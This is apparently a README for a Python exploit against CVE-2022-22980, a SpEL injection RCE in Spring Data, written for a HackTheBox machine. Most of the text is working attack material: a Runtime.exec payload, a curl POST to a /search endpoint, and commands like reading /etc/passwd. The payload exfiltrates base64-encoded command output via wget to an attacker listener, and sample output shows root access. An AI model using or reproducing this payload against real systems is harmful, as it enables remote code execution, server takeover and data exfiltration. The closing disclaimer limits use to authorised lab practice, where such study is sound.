
Exploitation de CVE-2022-22980
Exploit for remote code execution (RCE) on Spring Data via SpEL injection (Spring Expression Language).
The box exposes an endpoint /search that accepts a tracking_id parameter vulnerable to SpEL injection. This injection allows the execution of malicious Java expressions directly on the server.
Runtime.getRuntime().exec()http.server, subprocess, threading, base64)LPORT in the script)Modify the parameters in the script according to your environment:
TARGET = "http://<IP_CIBLE>:8080/search" # URL de la cible
LHOST = "<VOTRE_IP>" # IP locale (tun0 pour HTB)
LPORT = 80 # Port d'écoute
# Commande simple
python3 spel_shell.py "whoami"
# Commande avec pipe
python3 spel_shell.py "cat /etc/passwd"
# Énumération système
python3 spel_shell.py "uname -a"
# Vérifier l'accès réseau
python3 spel_shell.py "curl -s http://httpbin.org/get"
[*] Starting listener...
[*] Server listening on port 80
[*] Sending payload...
Payload: tracking_id=T(java.lang.Runtime).getRuntime().exec(new String[]{"bash","-c","whoami | base64 -w0 | xargs -I {} wget http://10.10.14.5:80/{}"})
[*] Received data: cm9vdA==
[+] Command output:
root
If you want to test the payload without the script:
# Terminal 1 : Démarrer le listener
python3 -m http.server 80
# Terminal 2 : Envoyer la payload
curl -X POST \
-d 'tracking_id=T(java.lang.Runtime).getRuntime().exec(new String[]{"bash","-c","whoami | base64 -w0 | xargs -I {} wget http://<VOTRE_IP>:80/{}"})' \
http://<IP_CIBLE>:8080/search
Port 80 is busy. Solutions:
# Vérifier quel processus utilise le port
sudo netstat -tlnp | grep :80
# Arrêter Apache si actif
sudo systemctl stop apache2
# Ou utiliser un autre port
# Modifiez LPORT dans le script et testez
python3 spel_shell.py "echo test"sudo on Linuxifconfig (tun0 for HTB) and not 127.0.0.1If you see "Raw data received" instead of "Command output", the command may not have produced valid output. Test a command that always produces output.
1. start_server() - Lance un serveur HTTP sur le port 80
↓
2. Envoie la payload SpEL via curl vers la cible
↓
3. La cible exécute la commande et encode le résultat en base64
↓
4. wget envoie le résultat vers le listener (GET http://LHOST:LPORT/<data>)
↓
5. Le Handler reçoit la data et la stocke
↓
6. Le script décode et affiche le résultat
This script is provided for educational purposes for HackTheBox boxes. Use it only on environments you have permission to test.
Author: Eliasdekiniweek Date: February 2026 Language: Python 3